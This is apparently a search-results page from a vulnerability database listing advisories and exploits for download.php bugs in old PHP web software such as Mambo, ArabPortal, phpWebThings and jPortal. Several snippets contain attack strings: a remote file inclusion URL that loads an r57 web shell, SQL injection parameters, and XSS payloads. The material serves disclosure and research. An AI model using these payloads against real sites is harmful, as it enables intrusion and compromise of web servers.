422 matches found
com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
No description provided by source. Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulnerability download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define('IN_PHPBB', true); //$phpbb_root_pa...
com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Exploit for unknown platform in category web applications ================================================================== com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability ================================================================== Bug Found by h4ntu http://h4ntu.com...
Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion
Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulnerability download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define('IN_PHPBB', true); //$phpbb_root_path = './'; include($phpbb_root_path...
Multiple file include exploits in Xtreme Downloads v.1.0
Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...
arabportalXSS.txt
ArabPortal 2.0 Stable .. The Best Arabian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1CODE download.php?action=byuser&userid=1&title=D3vil-0x1CODE /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it forever Connect Me By E-Mai...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in Arab Portal 2.0 (aka Arab Dynamic Portal or ADP) stable allow remote attackers to inject arbitrary web script or HTML via the title parameter in (1) online.php and (2) download.php...
CVE-2006-1504
CVE-2006-1504 concerns multiple XSS vulnerabilities in Arab Portal 2.0 (also called Arab Dynamic Portal/ADP). The issues allow remote attackers to inject arbitrary web script or HTML by manipulating the title parameter in two pages: online.php and download.php. The affected software is Arab Porta...
ArabPortal 2.0 Stable CrossSiteScripting
ArabPortal 2.0 Stable .. The Best Arabian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1/titleXSSCODE/XSS download.php?action=byuser&userid=1&title=D3vil-0x1/titleXSSCODE/XSS /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it...
SQL-injection and XSS in photokorn gallery
Advisory: SQL-injection and XSS in photokorn gallery Home Page: http://www.telekorn.com Vulnerability: SQL-injection Vulnerable script: search.php http://www.stockvault.net/gallery/search.php?action=search&type=detail&where=keywords'&keyword=dotted Disclosure of installation...
Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection
source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...
CVE-2005-3676
SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter...
CVE-2005-3676
The CVE-2005-3676 entry affects PhpWebThings 1.4.4, where a vulnerability in download.php allows SQL injection via the file parameter. This enables remote attackers to execute arbitrary SQL commands, with not-fully-specified impact details beyond the NVD summary. The connected documents confirm t...
phpWebThings144-2.txt
Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...
SQL injection in phpWebThing 1.4.4
Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...
phpWebThings download.php file Parameter SQL Injection
Binary data 3290.prm...
Sql injection in jPortal version 2.3.1 (module download)
Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportal. I check this bug only on one site. SQL injection attack if magic_quotes_gpc=Off. Problem is in file searching engine download.php, which code is in “module/down.inc.php” file: if($cat=='all') $q = "AND title LIKE '$word'"; else $q = "AND...
jPortalSQL.txt
Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportal. I check this bug only on one site. SQL injection attack if magic_quotes_gpc=Off. Problem is in file searching engine download.php, which code is in module/down.inc.php file: if($cat=='all') $q = "AND title LIKE '%$word%'"; else $q = "AND...
jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection
source: https://www.securityfocus.com/bid/14926/info JPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...
CVE-2005-2607
PHP file include vulnerability in download.php in PHPSimplicity Simplicity oF Upload before 1.3.1 allows remote attackers to include arbitrary local and remote files via the language parameter and a terminating null "%00" character...